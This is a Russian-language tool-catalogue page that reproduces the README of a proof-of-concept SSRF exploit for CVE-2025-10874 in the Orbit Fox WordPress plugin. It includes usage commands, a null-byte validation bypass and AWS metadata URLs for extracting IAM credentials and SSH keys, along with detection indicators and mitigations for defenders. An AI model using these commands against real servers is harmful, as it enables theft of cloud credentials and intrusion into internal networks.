Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Демонстрирует SSRF с обходом через инъекцию нулевого байта для CVE-2025-10874 | Kitploit
Инструменты/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Демонстрирует SSRF с обходом через инъекцию нулевого байта для CVE-2025-10874

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

alt text

CVE-2025-10874 — Proof of Concept SSRF для Orbit Fox

Proof of concept эксплойта, демонстрирующий уязвимость Server-Side Request Forgery (SSRF) в плагине Orbit Fox для WordPress с обходом валидации через null byte инъекцию.

Подробная статья в блоге: https://ryanmroth.com/articles/orbit-fox-ssrf

Детали уязвимости

ДетальПримечания
ID CVE:CVE-2025-10874
Затронутый плагин:Orbit Fox от ThemeIsle
Тип уязвимости:Server-Side Request Forgery (SSRF) (CWE-918)
Оценка CVSS:5.5 (средний)
Требуемые привилегии:Author+ (роль автора WordPress или выше)
Исправленная версия3.0.2+

Описание

Функциональность импорта MyStock в плагине Orbit Fox содержит уязвимость SSRF, которая позволяет аутентифицированным пользователям с привилегиями Author+ выполнять произвольные HTTP-запросы с сервера WordPress. Уязвимость существует в AJAX-действии handle-request-mystock-import, которое не выполняет надлежащую проверку и санитизацию параметров URL.

Эксплойт использует обход через null byte инъекцию (%00.txt) для обхода валидации URL, что позволяет получить доступ к внутренним сервисам метаданных, API облачных провайдеров и другим сетевым ресурсам, доступным с сервера.

Распространённые сценарии атак

Извлечение метаданных AWS EC2

  • Имя хоста инстанса: http://169.254.169.254/latest/meta-data/hostname
  • Учётные данные IAM: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Публичные ключи SSH: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Установка

Требования

  • Python 3.7+
  • Библиотека requests
  • Библиотека urllib3

Настройка

root@kitploit:~
# Клонирование репозитория
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Установка зависимостей (с помощью uv)
uv sync

# Или с помощью pip
pip install requests urllib3

Использование

Базовое использование

root@kitploit:~
# Извлечение имени хоста инстанса AWS (цель по умолчанию)
python orbit_fox_poc.py http://target.com -u author -p password123

# Указание произвольного целевого URL для SSRF
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Расширенные примеры

root@kitploit:~
# Извлечение учётных данных роли IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Извлечение публичного ключа SSH
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Тест без обхода через null byte (не сработает на исправленных версиях)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Включение отладочного вывода для устранения неполадок
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Параметры командной строки

root@kitploit:~
positional arguments:
  target                Целевой URL WordPress (например, http://example.com)

required arguments:
  -u, --username        Имя пользователя WordPress (требуется роль Author+)
  -p, --password        Пароль WordPress

optional arguments:
  -h, --help            Показать справочное сообщение и выйти
  -s, --ssrf-url        URL для запроса через SSRF
                        (по умолчанию: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Отключить обход через null byte (тест только базового SSRF)
  --debug               Включить отладочный вывод для устранения неполадок

Как это работает

  1. Аутентификация: Выполняет аутентификацию в WordPress с использованием предоставленных учётных данных
  2. Получение nonce: Извлекает security nonce из панели администратора WordPress
  3. Null byte инъекция: Добавляет %00.txt к целевому URL для обхода валидации
  4. Выполнение SSRF: Отправляет сформированный запрос к AJAX-конечной точке handle-request-mystock-import
  5. Получение содержимого: Загружает и отображает полученное содержимое из медиабиблиотеки WordPress

Обнаружение

Индикаторы в журналах

  • Необычные исходящие HTTP-запросы к сервисам метаданных (169.254.169.254)
  • Запросы к admin-ajax.php с действием handle-request-mystock-import
  • Загрузки в медиабиблиотеку WordPress из внутренних/метаданных URL

Меры по смягчению

  • Обновите Orbit Fox до версии 3.0.2 или новее
  • Внедрите строгую фильтрацию исходящего трафика на сервере WordPress
  • Отслеживайте и ограничивайте доступ к конечным точкам метаданных облака
  • Пересмотрите роли пользователей и ограничьте привилегии Author+

Ответственное раскрытие

Эта уязвимость была ответственно раскрыта вендору и исправлена в версии Orbit Fox 3.0.2. Данный proof of concept предоставлен для:

  • Проведения исследований и тестирования безопасности
  • Оценки уязвимостей авторизованных систем
  • Образовательных целей

Правовой отказ от ответственности

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предоставлен исключительно для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Пользователи обязаны:

  • Получить явное письменное разрешение перед тестированием
  • Использовать инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть разрешение
  • Соблюдать все применимые законы и нормативные акты

Автор не несёт ответственности за неправомерное использование этого инструмента.

Ссылки

  • Первоначальная уязвимость Alex Sanford – CVE-2023-2287
  • Детали CVE: CVE-2025-10874
  • Репозиторий плагина: Orbit Fox от ThemeIsle
  • Сервис метаданных AWS: Instance Metadata Service

Последнее обновление: 2025-10-06

Скачать инструмент